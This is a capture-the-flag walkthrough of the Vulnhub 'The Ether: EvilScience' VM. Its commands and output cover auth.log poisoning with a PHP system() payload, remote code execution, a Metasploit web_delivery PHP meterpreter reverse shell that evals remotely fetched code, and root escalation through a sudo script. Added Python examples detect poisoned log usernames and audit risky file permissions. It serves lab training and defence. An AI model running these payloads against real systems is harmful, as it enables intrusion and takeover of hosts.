The Ether: CTF walkthrough


Name: The Ether: EvilScience
Date release: 26 Oct 2017

Series: The Ether
Web page

Note: the VM from Vulnhub has an issue. You have to download the VM from this updated link (from the author's website): here



We use arp-scan to find the IP address of the VM.


Then, we scan the VM to find open ports and running services.

root@kali:~# nmap -A -F

Starting Nmap 7.60 ( ) at 2017-11-26 13:04 CET
Nmap scan report for theether-1.home (
Host is up (0.00074s latency).
Not shown: 98 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 00:0C:29:44:E7:CF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.74 ms theether-1.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 10.61 seconds

Remote commands execution

After a few scans and some research with the OWASP ZAP tool, I found that we are able to read the content of the auth.log file, where SSH connection information is stored.


We can poison this log file with the following connection attempt.

root@kali:~# ssh '<?php echo system($_GET['c']);?>'@
<?php echo system($_GET[c]);?>@'s password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@'s password: 
Permission denied, please try again.
<?php echo system($_GET[c]);?>@'s password: 
<?php echo system($_GET[c]);?>@ Permission denied (publickey,password).

Then, to check whether we have RCE, we can send this request.

root@kali:~# curl '' -s | head

Nov 26 05:04:53 theEther sshd[2024]: Invalid user about.php
research.php from
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user about.php
(23) Failed writing body
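From the defender's side, the trace this technique leaves is visible in the same log: sshd writes the client-supplied username verbatim into its "Invalid user" entries, so a PHP tag in that position is a near-certain sign that someone is poisoning auth.log to feed a file-inclusion bug. The following detector is an added example, not code from the walkthrough or from the VM; the log lines it runs over are constructed to match the sshd format shown above, and the IP addresses in them are made up.

```python
import re

# Constructed sample auth.log lines, modelled on the sshd entries shown in the
# walkthrough (source addresses are invented).  Line 2 and 3 carry the PHP tag
# that the ssh '<?php ...?>'@host connection attempt leaves behind.
SAMPLE_AUTH_LOG = """\
Nov 26 05:01:10 theEther sshd[1987]: Accepted password for evilscience from 10.0.0.5 port 51324 ssh2
Nov 26 05:04:53 theEther sshd[2024]: Invalid user <?php echo system($_GET[c]);?> from 10.0.0.9
Nov 26 05:04:53 theEther sshd[2024]: input_userauth_request: invalid user <?php echo system($_GET[c]);?> [preauth]
Nov 26 05:06:02 theEther sshd[2031]: Failed password for invalid user admin from 10.0.0.9 port 51400 ssh2
"""

# sshd logs the attacker-controlled name in "Invalid user <name> from <ip>" and
# "invalid user <name> [preauth]" lines, so those are the fields worth inspecting.
INVALID_USER_RE = re.compile(
    r"[Ii]nvalid user (?P<user>.*?)(?: from (?P<src>\S+)| \[preauth\]|$)"
)

# A conservative username alphabet: anything outside it is at least odd, and
# code markers (PHP tags, superglobals, eval/system) are treated as poisoning.
SAFE_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")
INJECTION_MARKERS = ("<?", "<script", "system(", "eval(", "$_get", "$_post", "$_request")


def classify_username(user):
    """Return 'poison' for code markers, 'odd' for non-username characters, else 'ok'."""
    lowered = user.lower()
    if any(marker in lowered for marker in INJECTION_MARKERS):
        return "poison"
    if not SAFE_USERNAME_RE.match(user):
        return "odd"
    return "ok"


def scan_auth_log(text):
    """Return (line_no, verdict, username, source_ip) for every suspicious invalid-user entry."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        match = INVALID_USER_RE.search(line)
        if not match:
            continue
        user = match.group("user")
        verdict = classify_username(user)
        if verdict != "ok":
            findings.append((line_no, verdict, user, match.group("src")))
    return findings


if __name__ == "__main__":
    for line_no, verdict, user, src in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: {verdict:6s} user={user!r} from={src}")
```

The real fix is on the web application side (never include a path derived from user input; serve pages from an allowlist), but alerting on the log entries is cheap and catches the reconnaissance phase before the second request that triggers the include.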

From RCE to reverse shell

For this CTF I will use the web_delivery exploit from the Metasploit Framework.

root@kali:~# msfconsole -q -x 'use exploit/multi/script/web_delivery'
msf exploit(web_delivery) > show options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST          yes       The local host to listen on. This must be an address on the local machine or
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python

msf exploit(web_delivery) >

I changed the SRVPORT (the default, 8080, is already used by OWASP ZAP), the PAYLOAD (PHP instead of Python), the LHOST and the TARGET (for a PHP payload) parameters.

msf exploit(web_delivery) > set TARGET 1
msf exploit(web_delivery) > set LHOST
msf exploit(web_delivery) > set SRVPORT 9090
SRVPORT => 9090
msf exploit(web_delivery) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(web_delivery) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(web_delivery) > [*] Using URL:
[*] Local IP:
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents(''));"

msf exploit(web_delivery) >

Finally, we run the PHP command through the RCE to gain a reverse shell.

root@kali:~# python 
Python 2.7.14 (default, Sep 17 2017, 18:50:44) 
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> url = ''' -d allow_url_fopen=true -r "eval(file_get_contents(''));"'''
>>> resp = requests.get(url)

Let's get a TTY with low privileges.


Privilege escalation

A weird Python script can be found in the /var/www/html/ directory.

bash-4.3$ ls -la
ls -la
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41

Moreover, we can execute this script with root privileges and without a password.


Plus, this script executes the cat command, so we are able to run any command we want with root privileges.
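The listing above already tells a defender most of the story: the setuid/setgid root file is group-writable by evilscience (so that account can replace what runs as root), and every entry in the web root is writable by the www-data group (so a compromised web server process can drop and modify files there, which is how the reverse shell gets uploaded). The audit below is an added example, not the author's or the VM's code; it parses the walkthrough's own ls -la output, with the setuid file's name replaced by a placeholder because the page does not show it.

```python
import re

# Listing copied from the walkthrough's `ls -la /var/www/html` output.  The name
# of the setuid entry is not visible on the page, so "<setuid-binary>" stands in.
SAMPLE_LISTING = """\
total 11312
drwxrwxr-x 4 root www-data        4096 Nov 23 19:44 .
drwxr-xr-x 5 root root            4096 Oct 23 18:31 ..
-rwxrwxr-x 1 root www-data        5891 Oct 23 19:27 about.php
drwxrwxr-x 3 root www-data        4096 Oct 23 18:02 images
-rwxrwxr-x 1 root www-data        6495 Oct 23 20:48 index.php
drwxrwxr-x 4 root www-data        4096 Oct 23 18:02 layout
-rwxrwxr-x 1 root www-data        5006 Oct 23 18:02 licence.txt
-rwxrwxr-x 1 root www-data       10641 Oct 23 19:26 research.php
-rwsrwsr-x 1 root evilscience 11527272 Nov 23 19:41 <setuid-binary>
"""

# One `ls -l` line: mode, link count, owner, group, size, month, day, time-or-year, name.
LS_LINE_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def mode_flags(mode):
    """Return (setuid, setgid, group_writable, world_writable) from a 10-char ls mode string."""
    user, group, other = mode[1:4], mode[4:7], mode[7:10]
    setuid = user[2] in "sS"      # 's' = set bit with exec, 'S' = set bit without exec
    setgid = group[2] in "sS"
    return setuid, setgid, group[1] == "w", other[1] == "w"


def audit_listing(text, web_group="www-data"):
    """Return (name, reason) pairs for entries that violate two simple rules:
    1. a setuid/setgid file must not be writable by anyone but its owner;
    2. web content must not be writable by the web server's group."""
    findings = []
    for line in text.splitlines():
        match = LS_LINE_RE.match(line)
        if not match:
            continue
        mode, owner, group, name = match.group("mode", "owner", "group", "name")
        setuid, setgid, group_w, world_w = mode_flags(mode)
        if mode[0] != "d" and (setuid or setgid):
            if world_w:
                findings.append((name, "setuid/setgid file is world-writable"))
            elif group_w and group != owner:
                findings.append((name, f"setuid/setgid {owner} file is writable by group {group}"))
        if group_w and group == web_group:
            findings.append((name, f"writable by web server group {web_group}"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_listing(SAMPLE_LISTING):
        print(f"{name}: {reason}")
```

On a live host the same two rules can be run over `find / -perm -4000 -o -perm -2000` output and over the document root; the fix for both findings is the usual one, root-owned content with mode 0644/0755 and no setuid helper inside a directory the web server can write to.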


We upload and execute a reverse shell on the system.


We read the flag hidden in a PNG file.


Finally, we decode the base64 flag.